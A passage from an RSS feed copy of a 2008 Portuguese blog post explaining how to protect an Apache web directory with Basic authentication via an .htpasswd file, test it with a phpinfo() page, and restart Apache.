<span style="font-family:arial;color:#cc9933;"><strong></strong></span><br />
após executar o comando ele vai pedir uma senha, que será a de acesso junto com o usuário web.</p>
<p>Agora no arquivo de configuração do Apache 2, /etc/apache2/apache2.conf , adicione o seguinte trecho:<br />
<span style="font-family:arial,helvetica,sans-serif;"><strong></strong></span></p>
<p><span style="color:#cc9933;">&lt;directory &#8220;/var/www/pasta_com_senha/&#8221;&gt;</span><span style="color:#cc9933;"><br />
AllowOverride None<br />
</span><span style="color:#cc9933;">Options Indexes MultiViews<br />
</span><span style="color:#cc9933;">Order allow,deny<br />
</span><span style="color:#cc9933;">Allow from all</span></p>
<p><span style="color:#cc9933;">AuthType Basic<br />
</span><span style="color:#cc9933;">AuthName &#8220;Acesso Restrito: &#8220;<br />
</span><span style="color:#cc9933;">AuthUserFile &#8220;/var/www/pasta_com_senha/.htpasswd&#8221;<br />
</span><span style="color:#cc9933;">Require valid-user</span> <span style="color:#cc9933;">&lt;/directory&gt;</span></p>
<p><span style="font-family:monospace;"><br />
</span>Explicando as últimas linhas:</p>
<p><span style="color:#cc9933;">AuthType Basic É o tipo de autenticação<br />
<span style="color:#cc9933;">AuthName &#8220;Acesso Restrito: &#8221; É a mensagem que aparece quando pedir a senha</span><br />
AuthUserFile &#8220;/var/www/pasta_com_senha/.htpasswd&#8221; É o arquivo que armazena a senha<br />
Require valid-user Essa linha indica que usuário pode acessar, pode trocar <span style="color:#cc9933;">valid-user pelo nome do usuário no caso web.</span></span></p>
<p>Para testar crie um arquivo php dentro da pasta com o seguinte conteúdo:</p>
<p><span style="color:#cc9933;">&lt;?<br />
</span><span style="color:#000099;"><span style="color:#000000;"><span style="color:#000099;"><span style="color:#000000;"><span style="color:#000099;"><span style="color:#000000;"><span style="color:#cc9933;"> phpinfo()<br />
?&gt;</span></span></span></span></span></span></span><br />
Agora renicie o apache2</p>
<p># /etc/init.d/apache2 stop<br />
# /etc/init.d/apache2 start</p>
<p>e tente acessar o arquivo php.</p>
<p>Qualquer dúvida comentem&#8230;</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/sourcefree.wordpress.com/1/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/sourcefree.wordpress.com/1/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sourcefree.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sourcefree.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sourcefree.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sourcefree.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sourcefree.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sourcefree.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sourcefree.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sourcefree.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=1&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sourcefree.wordpress.com/2008/04/11/apache-senha/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/eebeee09364c59db6c6b7e5291f6b8a9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sourcefree</media:title>
		</media:content>
	</item>
	</channel>
</rss>
